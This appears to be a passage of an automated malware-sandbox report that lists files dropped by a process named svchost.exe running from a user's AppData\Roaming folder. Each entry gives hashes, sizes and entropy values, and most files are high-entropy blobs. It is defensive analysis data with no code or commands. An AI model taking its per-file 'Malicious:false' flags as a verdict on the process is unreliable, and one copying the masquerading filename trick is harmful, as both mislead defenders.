                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.412732578345053
                                                          Encrypted:false
                                                          SSDEEP:12:Al9Xrng4Rb2T1brJ8PioD70h+ZMqBSwL1xYC2pL44NLS6B3yp9tZq:Avbh9/7is6TB3uZq
                                                          MD5:CC7594541A6F8E7A885603B7CCE0F32E
                                                          SHA1:00DF36E806C970BA1B730BD07E821A29B1F8ACF9
                                                          SHA-256:93A07EC3C1DF45368DD8DE4985E58645C084F3DED5AD80EC21C51B75B39F31A4
                                                          SHA-512:8A067D9A1485CEF20069FEFA30B48F895EC3F643E315DE3EDD251AA1B8AC2A4E77F8A7C2B5C50A7FF4FB19517BCB33414FE137429B5462815B6F098D548A4B68
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1040
                                                          Entropy (8bit):7.631896348211253
                                                          Encrypted:false
                                                          SSDEEP:24:ObOEOfUxI9RaLTN6Z5rxRW4VPYgQKOBFLja7Z17DznoFgn:zRfUHLTN6Z3HBYgvsfa73zoOn
                                                          MD5:8B26AB39A94089375E59FFC19935C04F
                                                          SHA1:2C3189B84114A01947DC24E5159AFD68072A61CA
                                                          SHA-256:B8F42929944A3D9EEB8768A0817CD9D1247F19EA898BDA3275059BE2D23694A9
                                                          SHA-512:BFD2B2D33AA4DABCA39410C4016B6037583504B4FC6DF9DCB8BB1BFCF6A155C783CC0ED85A35FE18AD510E5A3862EF1D7E62BAFACA66D58D25B5D8EC65D0B837
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):768
                                                          Entropy (8bit):7.320688518039275
                                                          Encrypted:false
                                                          SSDEEP:12:/YYKeOUtCYYs+GR7aH0o9AOCENa1Rtb7iuxYUZX+wMBT6/MtV9NhJL+NOsUaBxjQ:AYK2egRuH0yQRuUZX+wMBIeV9NbWOs/8
                                                          MD5:ED64231E63DD76557E7E4FF4588465A2
                                                          SHA1:10DDB5E202BF0CFAD131ACA088512B8659368546
                                                          SHA-256:933A268916E9E03D5BA1F006A1CB3CA4AA0D1E595A585B7EBAE6575A1B7A34A8
                                                          SHA-512:3F200E2DD8F4CDC91C7D98BEFDE0479226424D9FC341611412EC17BC42DEFC7B6BC4B99F78437ED82B0F59884574E3B39971139F5BA8A4CB30F52AF5CCF09D17
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):784
                                                          Entropy (8bit):7.393984883023864
                                                          Encrypted:false
                                                          SSDEEP:24:zN3sfQf9GbUAcVc2zSlQSRvhVsSun5fwiIaxTQM:zGQ6Umbv+RwcD
                                                          MD5:54AE032F0F497FC797254351545519C9
                                                          SHA1:757F4F7A046031C301D3E4E09697AAFC525D7793
                                                          SHA-256:754DFADFE5D78C1E71E33DE65BF4AABF9ABF79EBB3693354623B0FA67479D56D
                                                          SHA-512:4085100AA5532A4ACE0CA072DE525ADD295D41F066FE66E3B67727FA5CF6BED98730BF70791E2359C20F8F5CCCBCCF66D4A2E1EC8D73132225334A6ACF4FEDDF
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.442717468180738
                                                          Encrypted:false
                                                          SSDEEP:24:nlmmt3DmH/u4tlOI+y4Fz5EY5afDcQKHiU0bT:nFt3KfBp+y0zJ4q10P
                                                          MD5:BB2D7BDA0F1631C233E35849823D9B7C
                                                          SHA1:A1757EC3AF380B50788633CF451C290C2C291CEE
                                                          SHA-256:2551762693214AB391A5C4C1A877DC26E606986286572B9DD9AD2D4A137ECA6A
                                                          SHA-512:51B6AA75F4B52B160FA74118F85CA09A075DFF072F9BFE247ADE6945F47754EF575BF0D87A5A7DCEBBC32543F499FAE3809F8ED2992BF766DA947DF72EC4B66F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1952
                                                          Entropy (8bit):7.845399837193608
                                                          Encrypted:false
                                                          SSDEEP:48:eXciXyOqT2hsSVYVZJqV/LeWgc0XJiY93d6zpVO2E8D:ipyX2hsvJM/L9gJJiYZd6zpVOOD
                                                          MD5:E3FC1ECBB2888672101A1F59251144E8
                                                          SHA1:456EB84D9EDBD671CB8CA56D72E5A1C215A16D2E
                                                          SHA-256:75227BF0D8310A0EB260E7937E87D6A2C10EB455A38B0F5B2A0F747485C9B465
                                                          SHA-512:66AA5836DFAEC57604C6C6F36AAD84E00098A6B8D18B5AD5834973A52B413F4816B10EE8B4C22803E7D1E0209F130926549EEEF8E16109248FABB2D37384ABCC
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1312
                                                          Entropy (8bit):7.735564928204312
                                                          Encrypted:false
                                                          SSDEEP:24:oKco4yoABEHiIvuvwfrZvtoKVaF3iXQqL97x/QXcKfaEIuS6Babk9iHghdm+3r5K:oKuhABECfYDZ1JVaF3+97wDaQxa49pbG
                                                          MD5:580EB47C03F7803915EFC2C5FC11C260
                                                          SHA1:45A0576CA12781E7C2BC33F12E70A8C9014A61EC
                                                          SHA-256:CE136590B1F9CD633A61F3EBB585E8C52D0B75E00251CA63D9935A3AFDADEC1E
                                                          SHA-512:C8A04C6A296C35707DD2F1ADBBF20A1FF76FBF3DDD36644012397F35AE1705C339BCA083AB965FF0CA2F9A1F30E31C48273A8D88784C05AE11452DF5A4A96087
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1200
                                                          Entropy (8bit):7.67053843528927
                                                          Encrypted:false
                                                          SSDEEP:24:umFPeZVCrw/eeWDnyvPk75KH5oS4BqhICzLzXfsYKP8EZ+8n2xG:1RaC8meWDyvEYoBQ/Lzf/KP/Z+8n2xG
                                                          MD5:4D11EF8E9DD897B218A98030814ADE4D
                                                          SHA1:9317F694014730C5BE6564DB7255C57172A489C2
                                                          SHA-256:7EC15FB8FA2824D054735680880EA5F85BCAF599A6FFB1CBDBE6E3EA61D8BCD3
                                                          SHA-512:9DDBF301B05B9A68B1C9BE50AFE63E9C4512F406C3C803580B2134E9079CB10F311CF273D3166F08E7805BA5EC23E171A1F6ADB126B6FD7FEF7108151FB08587
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1408
                                                          Entropy (8bit):7.741513376049114
                                                          Encrypted:false
                                                          SSDEEP:24:Q1wYDyNY97L7NlCp2LUjVAjmnK4BH6gfeXgic4sag8ddEnbdpK:Q1/yNY9DNUp2L96KAagSgOBjrmRA
                                                          MD5:27748BCEA3B0D14C24F2DADA55E72E2B
                                                          SHA1:AE1C92EF20B0207556797455CF88C63164543030
                                                          SHA-256:1C3C61CE24E0620CE6E6056E45A099D915EB3177F53BAF0B82E1D2AA33BA5452
                                                          SHA-512:298A4644CD8364F0F9B4785752EAD59DDF0DA2384FB39532F19166180863DA30C044751D315EE6C544D73893E87BA6FCE85B71668B24D1EA8466F6DEDF5DD757
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):912
                                                          Entropy (8bit):7.564374888594902
                                                          Encrypted:false
                                                          SSDEEP:12:CxL4lVElTFt1r/LZKoRL8EF9HqSvQ+/3E+ASApg4Z+HCRBu/D1BpVVSuirm/+CPf:BlGpFHPnVlV3BAbgFJ/5xVSuiCWUDz
                                                          MD5:D1F7E5D85880AB7870771F70051D359A
                                                          SHA1:AD75047F705FF6B85A7C3228F5A1FA552BDD470A
                                                          SHA-256:BF68FE76889CFBD540D2F8B4E291E4239B9CFD8A0893A4728885F2EB0C863393
                                                          SHA-512:0C36C96AD477C781CCB3AE4D581C53545E6E8711AD6A1684184BE5CD616BED3C5BAFEAD64B55332A0BFC049FDB26387F5B8A9FEF6F61F6BA8C6FD985E0F9FB35
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.4331572522175255
                                                          Encrypted:false
                                                          SSDEEP:24:JssMAhZLffW4aJmMQv23h191GnHK8NsEfPSBIz/90Pf:vLffWTcu3h1Pg9yaS8/aPf
                                                          MD5:0717BA019F2904554C6712A235AA5202
                                                          SHA1:6802425149F0D41C55865F270F4CF17C55501F9F
                                                          SHA-256:A2530880E6FCCA1581F20276C700DCDEB30E0489038FC55F2136488A6C9AB429
                                                          SHA-512:EB49DFEAF8068FABC122A960300273DAA920C46E1A53F429506980FE69C1D66B50E1FADD63D899124F29CAD861DBBB333E4984C641FCFCCDCA81409E0FD3E25E
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):816
                                                          Entropy (8bit):7.434101513824242
                                                          Encrypted:false
                                                          SSDEEP:12:VCZRF5yAhVuUsTW2oZCWnFgouMiOI7ixgcoulAuCxv/6d20d2qnT5341/L9yqB9p:+Vs3UCWt/i+otv/6d2qnTpWJyqLbFb
                                                          MD5:20789D250A449AE08297DB324606BB77
                                                          SHA1:108788436F6585A31FCADDA955DB3FE8A40BDDBD
                                                          SHA-256:71D9150B562F88957DD276566C6CC5B399B03D1982566779F12FFBCC1684B2D9
                                                          SHA-512:0EDE2EC689F725AE39F20921053A7ABD2E9C10A3BAFC48D021EE870EA31B553D07B4A5FA5FF3C56AB84619313E303AA4211BF5A718A8236BE28A1C0073381C41
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3696
                                                          Entropy (8bit):7.934239568175516
                                                          Encrypted:false
                                                          SSDEEP:96:hYWb2Jh/a6EiVBDOKfnl3UUU/uceRBnDhxd25YYz9KT:uWSJhVEOBDxaB/uceRZsX9KT
                                                          MD5:A405767527AF8EA112D934081B79432D
                                                          SHA1:08C5CC4B9ACBB6680AD73C9ADC25B05DABCF756C
                                                          SHA-256:25A51BE1FC3EEA852AB7F56475CD76B792FD515F47A82047DBCA79AC57549A3D
                                                          SHA-512:84A90635A993374D4F6DA5D72F00D8F2A16F04642C3DE51BD6D89E02025181A542F0964388502FBD9BA4867C957D589E97B45976863EAF1ED8D21BF718ED2EFE
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2944
                                                          Entropy (8bit):7.891418139197436
                                                          Encrypted:false
                                                          SSDEEP:48:Ii5tOQSAEXVyosYUqxvt/8MKfnOhQhbpsVhVKfO/wwgUdBxr8pv8+NSrBMSh5Jav:IwOExosYTptU2QhbpsLb/wwgUTxr8J84
                                                          MD5:EB65B04819D49FE234AB3A212879FF98
                                                          SHA1:58C294CFD228CA3A39FDBE6C9B500D36606790D5
                                                          SHA-256:64AD36DD5B7C90EB27AB20FCA7067BFDB4995CD78F6AD8610B5A2D8B261B83D6
                                                          SHA-512:87CFE38DC1F544DE5795138B4C7CC68106B509EF6E74646E22C5C2EEC6FAF019BD11C843208C812E2B94ADC56A6A4FB0C2C6F5360FC7601892B69E2840DDE981
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2480
                                                          Entropy (8bit):7.880425685066334
                                                          Encrypted:false
                                                          SSDEEP:48:mf3LZEd1Itx/RpSlOpMZzTje3kIpxReezvyHWqRyHgmd6K6VU7:mgutx/2lOqZ34XaWvAmR6VU7
                                                          MD5:40A88920817969447B7D6A721D9C57FD
                                                          SHA1:15C477643E6A7C0AED3D48772605A11C2A0FAB31
                                                          SHA-256:9623C68740060035F321478FBF3C998A1A5A7323EBB7C7D4285E1C1AACF11367
                                                          SHA-512:184895B92239315D7726B88E811880806A4827BB44296A44C07BFDC5BB3E1155779549ADFB701E869856AD395B2E04D970749C1D036A4ACF65B5BB06D258C344
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):784
                                                          Entropy (8bit):7.391644650242055
                                                          Encrypted:false
                                                          SSDEEP:12:ESf/4IAqLHBq41v9Lq2jWQAvB3V5NomIkfrimFOvvJ1KrUoDYb8BcH+OaK9c2MW4:ES34U7BqoJh4vBNom/imIh1KrhzOaK9i
                                                          MD5:CFED908FA48B551F7E7CDEE362B53C39
                                                          SHA1:C9A72714BA842E61A9DB6B495E61B00443A39DB5
                                                          SHA-256:19A83591AA6B65148D8D5B8D02BD6B84D73B2A4E3F0D1679BEAA1DC76D26D6BA
                                                          SHA-512:B911C31C9BE848CD2F61751F985235EBEDBE97DB7511AC90A1BBF12B59B9419D80271481625DE74516D563C5F0E01F77BBA329829DBA0D5F6C3532ADFD578B45
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):944
                                                          Entropy (8bit):7.575709099348545
                                                          Encrypted:false
                                                          SSDEEP:24:DpvI0NqaL6cj7RMpDeG9mrNKO7bW4xmdmQ:DpJ6cyRecO9Vxwl
                                                          MD5:117D9053B4D00DAA54889C9301D70E54
                                                          SHA1:00D14EFA732D4617F4821978C41F802B76F2259C
                                                          SHA-256:CBFCF3779BDC0C893AF42EA94CEAFC86EEA8E87E01AAD0C683FC1808DB7EE643
                                                          SHA-512:79E5C8354E3ED6C121B5D0A9CE596A432D14E76FDCEBC76371E70EE9ED668443B4EF98EF154C346373CC3FAAF3F7B4DE3F12092349D0960B031B880EBDE3BD4A
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1040
                                                          Entropy (8bit):7.631434556001951
                                                          Encrypted:false
                                                          SSDEEP:24:CfRcmVCvI/bBP4NKiC6wvnna+jOFfoT9/p3BX9O:CfamVCvIuNKKInjO2/pxXM
                                                          MD5:59A903472EC0C25998CAD1C8B9EC40C2
                                                          SHA1:03C59E00A07D2D2FD232BAC15CF7CAC0F1F7500D
                                                          SHA-256:DAE0BB08DF54F12F7568347533DD3C4EC96D70ADC33F370C8CDEDAAD285E729D
                                                          SHA-512:311851A0F69DB0766BA2422FE2B44B728882F169809524C8A2C415A8AF7E6208F115A3AF6F910FF32F863B771A503D973731626B9F57906821178651B78ADED7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2672
                                                          Entropy (8bit):7.899329611980788
                                                          Encrypted:false
                                                          SSDEEP:48:5V9Fd8AsuEPEtgn9ZX9v2YJOsvs2ppF4c3lCd2eBoXy51fygamg+u:nFQP5tNTvHnFr142soXyKgaOu
                                                          MD5:770A0A0DE9AB28FFA4B7359D148342B4
                                                          SHA1:10E382E84B9B0FE7945B49044D6EA95B05D94A48
                                                          SHA-256:29047CD1BD31DF621EE0C7F0BF808EB9049B413A48A88EAD39EB264CD19518CF
                                                          SHA-512:D329B36E1F0BDAC730D7A886CF23DA473911319E867941EB07ABA708966DE4F6AB21BBBA1FA57A55A1ECDBF9B569494DCAE96016DD9EBD17F77AF522E940D658
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2272
                                                          Entropy (8bit):7.8784948496523155
                                                          Encrypted:false
                                                          SSDEEP:48:TiDs9tl3RvCwwn5mxNZtsoL9etDOh/A00EJDLfpnKGWaM:TDfKPn5mxNjfL9Wih/gEVFGaM
                                                          MD5:D6A22E2ECC609A0E476F54DB51F7AA6E
                                                          SHA1:56450D07FABE56E6DC346CC3EB11D95D1089B7BA
                                                          SHA-256:049324340FE1999D99AA8ECFDFE606EBEF712819922A1BE3459A7C51A37C860B
                                                          SHA-512:EE4A6DB7AF4DF80D53895D20DFF7BD70DEFCFFD100253AF29193935EFE6442CDB369A3E2E8CAA82A064158C937C98DC3CDDC4722C99CDA44A986B9CA29E442EE
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2368
                                                          Entropy (8bit):7.886236704485951
                                                          Encrypted:false
                                                          SSDEEP:48:TZBqQh3G+Y9Iy9LVyoxtVJ+qTUZaorjgHtgtSDyXjkI22JYDSbU1jVo:TZBqQbY9rfJxAqj4jsG22JMYUQ
                                                          MD5:ADDD13C38F08C6E460D47E6F9BB7D0EB
                                                          SHA1:328D79D590E3E68BC925576696A267B8574CBBF2
                                                          SHA-256:41DDB2C263514653FAC2B86D6C82673CCF7F72D21834AA7B8E3A87261545CF23
                                                          SHA-512:10BEBDFB936A8BACE5F0F0A74AC5984FDB155DA41DF459F6602362185BD3E353F9CEEFD587D2679349B494805FFC8D6DE88B7B0CF4FB0C7052B4930E215FC321
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2400
                                                          Entropy (8bit):7.8855791093618794
                                                          Encrypted:false
                                                          SSDEEP:48:1dwJ5r/DNLZ18yxfp14/HKiEvDKSDNx0qOln10FRAlk+hQ3YeAq/:IX/D5Z1/1C/ENNVClk+hQYc/
                                                          MD5:E8226F63562348B474067C40CAED1F01
                                                          SHA1:206E0694438C3BB9460B9B9877300E97A5CF2C8A
                                                          SHA-256:553723F041F21DEEBA5FB87DAEE97E5AEAC9C1B24796E3AB2C8D9FECF21D85CC
                                                          SHA-512:9F4E80B20BC066468ED44091BF1AA1F53493389909ED2D3DB148119A0E94F2065671BD9D99244FD689FC1CC80064CCC2BEF817A6E51E35AF3D8A4E65FE83B8E0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1568
                                                          Entropy (8bit):7.781634566827969
                                                          Encrypted:false
                                                          SSDEEP:48:w9Kz3biLQUHRRV32p8rWkLc0vhMR12iTO5:w0ri573FW10ZMR12is
                                                          MD5:958CF3B1B48F896E4821C98B5E97E17E
                                                          SHA1:4908B29A331EFADEF29CA989E1969531D8B0C823
                                                          SHA-256:D96669D9E06DAC6174951BC946197E24A1A067CD8D896BD86716168356AE5C7F
                                                          SHA-512:774135D98B96C594BCA091936E2A8F9BD83277DAC5007B5B78477FBBFD690DD7D6C8865253CFC27298FFBC612FFBA27B6FD6F356C49E3DC8103B0C0FB16BF31F
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):864
                                                          Entropy (8bit):7.451221399253438
                                                          Encrypted:false
                                                          SSDEEP:24:Xvp2OHbvQV/L6mTU4OjrBxYu4r91J8PyCSLEn:/pnoV/mIOjrBiu4r2q+
                                                          MD5:CF6A238970A38B24BE9B6BAA3B137FC4
